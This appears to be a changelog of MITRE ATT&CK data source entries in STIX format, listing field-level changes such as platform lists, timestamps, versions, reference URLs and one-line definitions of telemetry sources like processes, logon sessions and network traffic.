| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | Azure AD | Windows |
| x_mitre_collection_layers[0] | Host | Cloud Control Plane |
| x_mitre_collection_layers[1] | Cloud Control Plane | Host |
| created | 2021-10-20T15:05:19.274110Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-11-10T09:30:48.693951Z | 2022-03-30T14:26:51.803Z |
| Description |
|---|
| Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Google Workspace |
| x_mitre_platforms[1] | Linux | IaaS |
| x_mitre_platforms[2] | macOS | Linux |
| x_mitre_platforms[3] | IaaS | Office 365 |
| x_mitre_platforms[5] | Office 365 | Windows |
| x_mitre_platforms[6] | Google Workspace | macOS |
| x_mitre_collection_layers[0] | Host | Cloud Control Plane |
| x_mitre_collection_layers[1] | Cloud Control Plane | Host |
| created | 2021-10-20T15:05:19.272925Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272925Z | 2022-05-11T14:00:00.188Z |
| Description |
|---|
| A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275410Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275410Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | IaaS | Azure AD |
| x_mitre_platforms[1] | SaaS | Google Workspace |
| x_mitre_platforms[2] | Office 365 | IaaS |
| x_mitre_platforms[3] | Azure AD | Office 365 |
| x_mitre_platforms[4] | Google Workspace | SaaS |
| created | 2021-10-20T15:05:19.273990Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.694425Z | 2022-03-30T14:26:51.804Z |
| Description |
|---|
| Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272382Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.694594Z | 2021-11-10T09:30:48.694Z |
| Description |
|---|
| A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.694901Z | 2022-10-21T15:55:31.986Z |
| x_mitre_platforms[0] | Windows | Containers |
| x_mitre_platforms[2] | macOS | Network |
| x_mitre_platforms[3] | Network | Windows |
| x_mitre_platforms[4] | Containers | macOS |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_contributors[0] | Austin Clark | Center for Threat-Informed Defense (CTID) |
| x_mitre_contributors[1] | Center for Threat-Informed Defense (CTID) | Austin Clark, @c2defense |
| x_mitre_collection_layers[0] | Host | Container |
| x_mitre_collection_layers[1] | Container | Host |
| created | 2021-10-20T15:05:19.273124Z | 2021-10-20T15:05:19.273Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0017 | https://attack.mitre.org/data-sources/DS0017 |
| Description |
|---|
| A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274834Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-11-10T09:30:48.694982Z | 2021-11-10T09:30:48.694Z |
| Description |
|---|
| Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275460Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275460Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.272982Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.695272Z | 2022-03-30T14:26:51.804Z |
| Description |
|---|
| A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[1] | macOS | Windows |
| x_mitre_platforms[2] | Windows | macOS |
| created | 2021-10-20T15:05:19.274252Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-11-10T09:30:48.695431Z | 2022-03-30T14:26:51.805Z |
| Old Description | New Description |
|---|---|
| A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)(Citation: Microsoft File Mgmt) | A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Network |
| x_mitre_platforms[2] | macOS | Windows |
| x_mitre_platforms[3] | Network | macOS |
| created | 2021-10-20T15:05:19.273672Z | 2021-10-20T15:05:19.273Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0022 | https://attack.mitre.org/data-sources/DS0022 |
| description | A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)(Citation: Microsoft File Mgmt) | A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt) |
| modified | 2021-11-10T09:30:48.695560Z | 2022-04-21T14:50:59.123Z |
| Description |
|---|
| A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | IaaS | Azure AD |
| x_mitre_platforms[1] | SaaS | Google Workspace |
| x_mitre_platforms[2] | Office 365 | IaaS |
| x_mitre_platforms[3] | Azure AD | Linux |
| x_mitre_platforms[4] | Linux | Office 365 |
| x_mitre_platforms[5] | macOS | SaaS |
| x_mitre_platforms[7] | Google Workspace | macOS |
| created | 2021-10-20T15:05:19.273181Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.695762Z | 2022-03-30T14:26:51.805Z |
| Description |
|---|
| Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.265145Z | 2021-10-20T15:05:19.265Z |
| modified | 2021-11-10T09:30:48.695921Z | 2022-03-30T14:26:51.805Z |
| Description |
|---|
| A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | IaaS | Google Workspace |
| x_mitre_platforms[2] | SaaS | IaaS |
| x_mitre_platforms[4] | Azure AD | SaaS |
| x_mitre_platforms[5] | Google Workspace | Windows |
| x_mitre_collection_layers[0] | Host | Cloud Control Plane |
| x_mitre_collection_layers[1] | Cloud Control Plane | Host |
| created | 2021-10-20T15:05:19.275275Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-11-10T09:30:48.695999Z | 2022-03-30T14:26:51.805Z |
| Description |
|---|
| A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271956Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-11-10T09:30:48.696179Z | 2021-11-10T09:30:48.696Z |
| Description |
|---|
| A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274538Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274538Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275202Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275202Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272087Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.696693Z | 2021-11-10T09:30:48.696Z |
| Old Description | New Description |
|---|---|
| Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorizaton(Citation: Microsoft Audit Logon Events) | Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.696771Z | 2022-10-21T15:56:16.481Z |
| description | Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorizaton(Citation: Microsoft Audit Logon Events) | Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events) |
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | Linux | Google Workspace |
| x_mitre_platforms[2] | macOS | IaaS |
| x_mitre_platforms[3] | IaaS | Linux |
| x_mitre_platforms[4] | SaaS | Office 365 |
| x_mitre_platforms[5] | Office 365 | SaaS |
| x_mitre_platforms[6] | Azure AD | Windows |
| x_mitre_platforms[7] | Google Workspace | macOS |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.274352Z | 2021-10-20T15:05:19.274Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0028 | https://attack.mitre.org/data-sources/DS0028 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Cloud Control Plane |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Cloud Control Plane |
| Description |
|---|
| Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271698Z | 2022-10-20T20:20:36.693Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271698Z | 2021-10-20T15:05:19.271Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0004 | https://attack.mitre.org/data-sources/DS0004 |
| Description |
|---|
| Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.272552Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.697073Z | 2022-03-30T14:26:51.806Z |
| Description |
|---|
| Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.273816Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.697149Z | 2022-03-30T14:26:51.806Z |
| Description |
|---|
| A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.274950Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-11-10T09:30:48.697227Z | 2022-03-30T14:26:51.806Z |
| Description |
|---|
| Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.697365Z | 2022-10-20T20:18:34.334Z |
| x_mitre_platforms[0] | Windows | IaaS |
| x_mitre_platforms[2] | macOS | Windows |
| x_mitre_platforms[3] | IaaS | macOS |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.274446Z | 2021-10-20T15:05:19.274Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0029 | https://attack.mitre.org/data-sources/DS0029 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Cloud Control Plane |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Cloud Control Plane |
| Description |
|---|
| A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273623Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273623Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272712Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-11-10T09:30:48.697559Z | 2021-11-10T09:30:48.697Z |
| Description |
|---|
| Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.697770Z | 2022-10-21T15:58:32.516Z |
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272143Z | 2021-10-20T15:05:19.272Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0009 | https://attack.mitre.org/data-sources/DS0009 |
| Description |
|---|
| Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Containers |
| x_mitre_platforms[2] | macOS | Windows |
| x_mitre_platforms[3] | Containers | macOS |
| x_mitre_collection_layers[0] | Host | Container |
| x_mitre_collection_layers[1] | Container | Host |
| created | 2021-10-20T15:05:19.271574Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-11-10T09:30:48.697992Z | 2022-03-30T14:26:51.806Z |
| Description |
|---|
| A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.698144Z | 2022-10-21T15:58:58.335Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272610Z | 2021-10-20T15:05:19.272Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0012 | https://attack.mitre.org/data-sources/DS0012 |
| external_references[1]['source_name'] | Microsoft PowerShell Logging | FireEye PowerShell Logging |
| external_references[1]['description'] | Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021. | Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7 | https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html |
| external_references[2]['source_name'] | FireEye PowerShell Logging | Microsoft AMSI |
| external_references[2]['description'] | Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021. | Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html | https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal |
| external_references[3]['source_name'] | Microsoft AMSI | Microsoft PowerShell Logging |
| external_references[3]['description'] | Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021. | Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7 |
| Description |
|---|
| Information from host telemetry providing insights about system status, errors, or other notable functional activity |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.698218Z | 2022-10-20T20:22:52.060Z |
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272664Z | 2021-10-20T15:05:19.272Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0013 | https://attack.mitre.org/data-sources/DS0013 |
| Description |
|---|
| A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Linux |
| x_mitre_platforms[1] | Linux | Windows |
| created | 2021-10-20T15:05:19.273300Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.698295Z | 2022-03-30T14:26:51.807Z |
| Description |
|---|
| A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273471Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-11-10T09:30:48.698426Z | 2021-11-10T09:30:48.698Z |
| Description |
|---|
| A profile representing a user, device, service, or application used to authenticate and access resources |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.698605Z | 2022-10-21T15:59:59.646Z |
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | Linux | Containers |
| x_mitre_platforms[2] | macOS | Google Workspace |
| x_mitre_platforms[4] | SaaS | Linux |
| x_mitre_platforms[6] | Azure AD | SaaS |
| x_mitre_platforms[7] | Containers | Windows |
| x_mitre_platforms[8] | Google Workspace | macOS |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271422Z | 2021-10-20T15:05:19.271Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0002 | https://attack.mitre.org/data-sources/DS0002 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Host |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_collection_layers | Host |
| Description |
|---|
| Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[1] | Windows | Linux |
| x_mitre_platforms[2] | Linux | Windows |
| created | 2021-10-20T15:05:19.275065Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-11-10T09:30:48.698797Z | 2022-03-30T14:26:51.807Z |
| Description |
|---|
| The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
